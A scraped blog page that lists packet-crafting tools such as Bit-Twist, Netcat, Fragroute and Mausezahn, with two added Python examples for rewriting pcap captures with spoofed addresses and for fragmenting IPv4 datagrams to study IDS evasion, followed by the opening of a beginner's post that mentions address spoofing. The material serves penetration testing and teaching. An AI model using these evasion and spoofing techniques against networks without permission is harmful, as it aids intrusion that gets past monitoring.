<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download yersinia: <a href="http://www.yersinia.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.yersinia.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">6. packETH</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
packETH is another packet crafting tool: a Linux GUI tool for Ethernet. It lets you build a packet field by field and send a sequence of such packets quickly. Like the other tools in this list, it supports various protocols. You can set the number of packets and the delay between them, along with several other parameters.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download packETH: <a href="http://packeth.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://packeth.sourceforge.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">7. Colasoft Packet Builder</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Colasoft Packet Builder is a freeware tool for creating and editing network packets. A network admin can use it to test the network against attackers and intruders. It is a Windows-only tool.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Colasoft Packet Builder:<a href="http://www.colasoft.com/download/products/download_packet_builder.php" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.colasoft.com/download/products/download_packet_builder.php</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">8. Bit-Twist</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Bit-Twist is a less popular but effective tool for replaying captured packets onto a live network. It takes a tcpdump trace file (.pcap) and regenerates its packets on the wire, and it ships with a trace file editor (bittwiste) that lets you change specific fields of captured packets before replay. Network admins can use it for testing firewalls, IDS and IPS, and for troubleshooting network problems, among other things.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Bit-Twist: <a href="http://bittwist.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://bittwist.sourceforge.net/</span></a></div>
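<div>Bit-Twist's trace editor is doing something simple underneath: parse the pcap container, change bytes in a record, and fix the checksums the change broke. Here is an added example of that workflow in plain Python; it is not Bit-Twist's code and not from the original article, and it works on a constructed sample frame rather than a real capture. It writes a pcap file image, reads it back, rewrites the destination address and TTL of a frame, and repairs the IPv4 header checksum and the UDP/TCP checksum, the detail that is easiest to forget when editing a capture by hand.</div>

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4        # classic microsecond pcap, as written by tcpdump/libpcap
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; returns 0 over data whose embedded checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def write_pcap(records, linktype: int = LINKTYPE_ETHERNET) -> bytes:
    """records: iterable of (ts_sec, ts_usec, frame). Returns a complete pcap file image."""
    out = bytearray(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype))
    for sec, usec, frame in records:
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def read_pcap(data: bytes):
    """Returns (linktype, [(ts_sec, ts_usec, frame), ...]); accepts either byte order of the classic format."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = {PCAP_MAGIC: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng and nanosecond pcap are not handled here)")
    linktype = struct.unpack(endian + "IHHiIII", data[:24])[6]
    off, records = 24, []
    while off + 16 <= len(data):
        sec, usec, incl, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        records.append((sec, usec, data[off:off + incl]))
        off += incl
    return linktype, records


def rewrite_ipv4(frame: bytes, new_src=None, new_dst=None, new_ttl=None) -> bytes:
    """Edit addresses/TTL of an Ethernet/IPv4 frame and repair every checksum the edit invalidates."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    f, ip = bytearray(frame), 14
    ihl, proto = (f[ip] & 0x0F) * 4, f[ip + 9]
    if new_ttl is not None:
        f[ip + 8] = new_ttl
    if new_src is not None:
        f[ip + 12:ip + 16] = socket.inet_aton(new_src)
    if new_dst is not None:
        f[ip + 16:ip + 20] = socket.inet_aton(new_dst)
    f[ip + 10:ip + 12] = b"\x00\x00"                       # IP checksum covers the whole header
    f[ip + 10:ip + 12] = struct.pack("!H", ip_checksum(bytes(f[ip:ip + ihl])))
    if (new_src is not None or new_dst is not None) and proto in (6, 17):
        # TCP/UDP checksums cover a pseudo-header with both IPs, so an address edit breaks them too
        total_len = struct.unpack("!H", f[ip + 2:ip + 4])[0]   # ignores Ethernet padding after the datagram
        start, csum_off = ip + ihl, 16 if proto == 6 else 6
        seg = bytearray(f[start:ip + total_len])
        seg[csum_off:csum_off + 2] = b"\x00\x00"
        pseudo = struct.pack("!4s4sBBH", bytes(f[ip + 12:ip + 16]), bytes(f[ip + 16:ip + 20]), 0, proto, len(seg))
        csum = ip_checksum(pseudo + bytes(seg))
        if proto == 17 and csum == 0:
            csum = 0xFFFF                                   # RFC 768: a computed zero is sent as all ones
        f[start + csum_off:start + csum_off + 2] = struct.pack("!H", csum)
    return bytes(f)


def checksums_ok(frame: bytes) -> bool:
    """Verify the IP and TCP/UDP checksums of an Ethernet/IPv4 frame the way a receiving stack would."""
    ip = 14
    ihl, proto = (frame[ip] & 0x0F) * 4, frame[ip + 9]
    total_len = struct.unpack("!H", frame[ip + 2:ip + 4])[0]
    if ip_checksum(frame[ip:ip + ihl]) != 0:
        return False
    if proto not in (6, 17):
        return True
    seg = frame[ip + ihl:ip + total_len]
    if proto == 17 and seg[6:8] == b"\x00\x00":
        return True                                         # UDP over IPv4 without a checksum is legal
    pseudo = struct.pack("!4s4sBBH", frame[ip + 12:ip + 16], frame[ip + 16:ip + 20], 0, proto, len(seg))
    return ip_checksum(pseudo + seg) == 0


def make_udp_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed sample frame (not a real capture): Ethernet/IPv4/UDP with valid checksums."""
    udp_len = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + payload
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst), 0, 17, udp_len)
    udp = udp[:6] + struct.pack("!H", ip_checksum(pseudo + udp) or 0xFFFF) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0x1234, 0x4000, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return bytes.fromhex("001122334455" "66778899aabb" "0800") + ip + udp
```

<div>Looping <code>rewrite_ipv4()</code> over the records returned by <code>read_pcap()</code> and handing the result to <code>write_pcap()</code> is the whole bittwiste pipeline for an address rewrite. Note what happens without the repair step: patching the destination address alone leaves the IP header checksum stale, so <code>checksums_ok()</code> rejects the frame and so would any host you replay it to, which is also why replayed-but-unrepaired captures make poor IDS tests.</div>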
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">9. Libtins</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Libtins is a C++ library for crafting, sending, sniffing and interpreting network packets. Because it is a library with the source available, C++ developers can build their own tools on top of it and extend it as needed. It is fast and well designed; whether you pick it over Scapy or Libcrafter is up to you and your language of choice.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Libtins: <a href="http://libtins.github.io/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://libtins.github.io/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">10. Netcat</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Netcat is a popular tool that reads and writes data over TCP or UDP connections. It is reliable and easy to use, and other tools and scripts are often built on top of it. The best thing about it is that it can create almost any kind of network connection, including listening on a port, which is why it is often called the networking Swiss Army knife. Note that it works at the transport layer and above: it sends data over ordinary sockets and does not let you craft headers, so it belongs to this list as a payload delivery and testing tool rather than a packet crafter.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The original netcat was written by Hobbit and released in 1995.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Netcat: <a href="http://nc110.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://nc110.sourceforge.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">11. WireEdit</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WireEdit is a full-featured WYSIWYG network packet editor: you can edit every layer of a packet in a simple interface. The tool is free to use, but you have to contact the company to obtain a licence. The list of supported protocols is long: Ethernet, IPv4, IPv6, UDP, TCP, SCTP, ARP, RARP, DHCP, DHCPv6, ICMP, ICMPv6, IGMP, DNS, LLDP, RSVP, FTP, NETBIOS, GRE, IMAP, POP3, RTCP, RTP, SSH, TELNET, NTP, LDAP, XMPP, VLAN, VXLAN, CIFS/SMB v1 (original), BGP, OSPF, SMB3, iSCSI, SCSI, HTTP/1.1, OpenFlow 1.0-1.3, SIP, SDP, MSRP, MGCP, MEGACO (H.248), H.245, H.323, CISCO Skinny, Q.931/H.225, SCCP, SCMG, SS7 ISUP, TCAP, GSM MAP R4, GSM SM-TP, M3UA, M2UA, M2PA, CAPWAP, IEEE 802.11, with more to come.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It is multi-platform, with builds for Windows XP or higher, Ubuntu Desktop and Mac OS X.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download WireEdit: <a href="https://wireedit.com/downloads.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://wireedit.com/downloads.html</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">12. epb – Ethernet Packet Bombardier</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
epb, or Ethernet Packet Bombardier, is a similar but simpler tool. It lets you send customized Ethernet frames. It has no GUI, but it is easy to use.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can read more about this tool here: <a href="http://maz-programmersdiary.blogspot.fi/2012/05/epb-ethernet-package-bombardier.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://maz-programmersdiary.blogspot.fi/2012/05/epb-ethernet-package-bombardier.html</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">13. Fragroute</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Fragroute is a packet crafting tool that intercepts, modifies and rewrites egress traffic destined for a given host. It implements most of the IDS evasion techniques described by Ptacek and Newsham: IP fragmentation, overlapping fragments, TCP segmentation, chaff packets, reordering and the like, driven by a small rule file (for example <code>ip_frag 8</code>). That lets you test whether your IDS reassembles traffic the same way the end host does, which is the whole point of insertion and evasion attacks. It is open source with a command-line interface and is available for Linux, BSD and Mac OS.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Fragroute: <a href="http://www.monkey.org/~dugsong/fragroute/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.monkey.org/~dugsong/fragroute/</span></a></div>
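<div>The fragmentation trick fragroute automates with <code>ip_frag</code> is worth seeing end to end. This added example (not fragroute's code and not from the original article) fragments a constructed IPv4 datagram for a small MTU, producing correctly offset fragments with valid header checksums, and then reassembles the pieces in any order while flagging overlapping fragments. The reassembler resolves overlaps with a "first fragment wins" policy; that policy is an assumption for the example, since real stacks differ, and that difference is precisely what an IDS evasion via overlapping fragments exploits.</div>

```python
import struct


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; 0 when run over a header whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _patch_header(header: bytes, total_len: int, flags_frag: int) -> bytes:
    """Return a copy of an IPv4 header with new length/fragment fields and a recomputed checksum."""
    h = bytearray(header)
    h[2:4] = struct.pack("!H", total_len)
    h[6:8] = struct.pack("!H", flags_frag)
    h[10:12] = b"\x00\x00"
    h[10:12] = struct.pack("!H", ip_checksum(bytes(h)))
    return bytes(h)


def make_ipv4_packet(src: bytes, dst: bytes, proto: int, payload: bytes, ident: int = 0xBEEF) -> bytes:
    """Constructed sample datagram (no options, DF clear); src/dst are 4-byte addresses."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, 64, proto, 0, src, dst)
    return _patch_header(header, 20 + len(payload), 0) + payload


def fragment_ipv4(packet: bytes, mtu: int) -> list:
    """Split one datagram into fragments that fit `mtu`, the way fragroute's ip_frag rule does."""
    ihl = (packet[0] & 0x0F) * 4
    header, payload = packet[:ihl], packet[ihl:]
    flags_frag = struct.unpack("!H", header[6:8])[0]
    if flags_frag & 0x4000:
        raise ValueError("DF is set; this datagram must not be fragmented")
    step = (mtu - ihl) // 8 * 8               # every non-final fragment carries a multiple of 8 bytes
    if step <= 0:
        raise ValueError("MTU too small for the header")
    base, orig_mf = flags_frag & 0x1FFF, flags_frag & 0x2000
    frags = []
    for pos in range(0, len(payload), step):
        chunk = payload[pos:pos + step]
        more = 0x2000 if pos + len(chunk) < len(payload) else orig_mf
        frags.append(_patch_header(header, ihl + len(chunk), more | (base + pos // 8)) + chunk)
    return frags


def reassemble(fragments: list):
    """Rebuild the datagram from fragments in any order; returns (packet, saw_overlap).

    Overlaps are resolved 'first wins' (assumed policy). Real stacks differ, and an IDS
    that picks a different policy than the target host reconstructs a different payload."""
    parsed = []
    for f in fragments:
        ihl = (f[0] & 0x0F) * 4
        ff = struct.unpack("!H", f[6:8])[0]
        parsed.append(((ff & 0x1FFF) * 8, bool(ff & 0x2000), f[:ihl], f[ihl:]))
    parsed.sort(key=lambda p: p[0])           # stable sort: equal offsets keep arrival order
    buf, expected, overlap, last_end = bytearray(), 0, False, None
    for off, more, _hdr, data in parsed:
        end = off + len(data)
        if off < expected:
            overlap = True
        elif off > expected:
            raise ValueError("hole in fragment stream at offset %d" % expected)
        if end > expected:                    # only the bytes not already seen are taken
            buf += data[expected - off:]
            expected = end
        if not more:
            last_end = end
    if last_end is None or last_end != expected:
        raise ValueError("final fragment missing")
    first_hdr = parsed[0][2]
    flags = struct.unpack("!H", first_hdr[6:8])[0] & 0x4000   # clear MF and offset, keep DF bit
    return _patch_header(first_hdr, len(first_hdr) + len(buf), flags) + bytes(buf), overlap


if __name__ == "__main__":
    pkt = make_ipv4_packet(bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]), 17, bytes(range(100)))
    for frag in fragment_ipv4(pkt, 48):
        print(len(frag), frag[6:8].hex())
    print(reassemble(fragment_ipv4(pkt, 48))[0] == pkt)
```

<div>The overlap case is the one to study: append a second copy of a middle fragment whose payload has been replaced, and this reassembler still returns the original datagram because it keeps the bytes it saw first. A stack that prefers the later data would hand the application the replaced bytes instead, so a signature matched against one reconstruction is silent on the other. An IDS has to know, per target, which policy that host applies; fragroute exists to check whether it does.</div>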
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">14. Mausezahn</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Mausezahn is a fast traffic generator that lets you send almost any kind of network packet. It is used for penetration testing of firewalls and IDS, but it is up to you how to use it in your network to find security bugs. You can also use it to test whether your network holds up under DoS-style traffic. Notably, it gives you full control over the NIC, down to raw frames. It supports ARP, BPDU (PVST), CDP, LLDP, IP, IGMP, UDP, TCP (stateless), ICMP (partly), DNS, RTP (optionally with an RX mode for jitter measurements) and Syslog. It is now maintained as part of the netsniff-ng toolkit.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Mausezahn: <a href="http://www.perihel.at/sec/mz/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.perihel.at/sec/mz/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">15. EIGRP-tools</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
EIGRP-tools is an EIGRP packet generator and sniffer combined. It was developed to test the security of the EIGRP routing protocol, so to use it you need to understand Layer 3 and EIGRP itself. It is open source with a command-line interface and is available for Linux, Mac OS and BSD.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download EIGRP-tools: <a href="http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz</a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are a few of the best free tools for packet crafting. I recommend trying all of them to see how they work. As already mentioned, learn about networks, packet layers, packet structures, headers and the rest before using them. With that knowledge you can mount better attacks and build better defenses against them.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is one of the best ways to perform network penetration testing. Build a layer of security, then try to break it yourself; that way you find and fix the weaknesses in your own mechanism before an attacker exploits them. Attackers constantly try to get into companies' internal networks, and in many recent breaches the internal network was compromised to reach confidential information. Network security is therefore one of the most important tasks in any business. So learn packet crafting and learn these tools: the more you learn, the better security practitioner you become. Each of these tools was created for a specific purpose; use them to modify packets, test firewall rules and probe your own security.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note: We do not encourage using these tools against a network without prior permission. Most businesses have proper security monitoring, and if you are caught attacking a network you may be prosecuted under cyber-crime laws in most countries. The purpose of this article is to make you aware of these tools for learning. The author holds no responsibility for any illegal use.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you have anything to ask or suggest, comment below. I hope you find this article useful and informative.</div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-76808022383048961752016-01-07T13:35:00.000+05:302016-01-07T13:35:45.636+05:30Packet crafting for Beginners<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is the art of building a packet to precise specifications in order to probe a network, carry out attacks and exploit vulnerabilities in it. It is mainly used to penetrate a network's structure. Various vulnerability assessment tools can craft such packets, and as a coin has two sides, the same tools let attackers find the vulnerabilities of a targeted system. Crafting is a technically advanced and complex form of vulnerability exploitation, and it is difficult to detect and diagnose.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Steps Involved in Packet Crafting</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The idea behind crafting is to simulate an attack and to identify the properties of a network. Crafted packets are commonly used to get past firewalls and intrusion detection software. The following are the steps involved in packet crafting:</div>
<ul style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Assembly:</span> This is the first step in packet crafting. In this process, the attacker selects the target network, collects whatever vulnerability information is available and creates the packet. The packet should be designed so that it passes through the network unnoticed; for example, the source address could be spoofed before the packet is sent.</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Editing:</span> In this step, the packets are tested before sending. They are edited so that the maximum amount of information can be retrieved by injecting a minimum number of packets.</div>
</li>
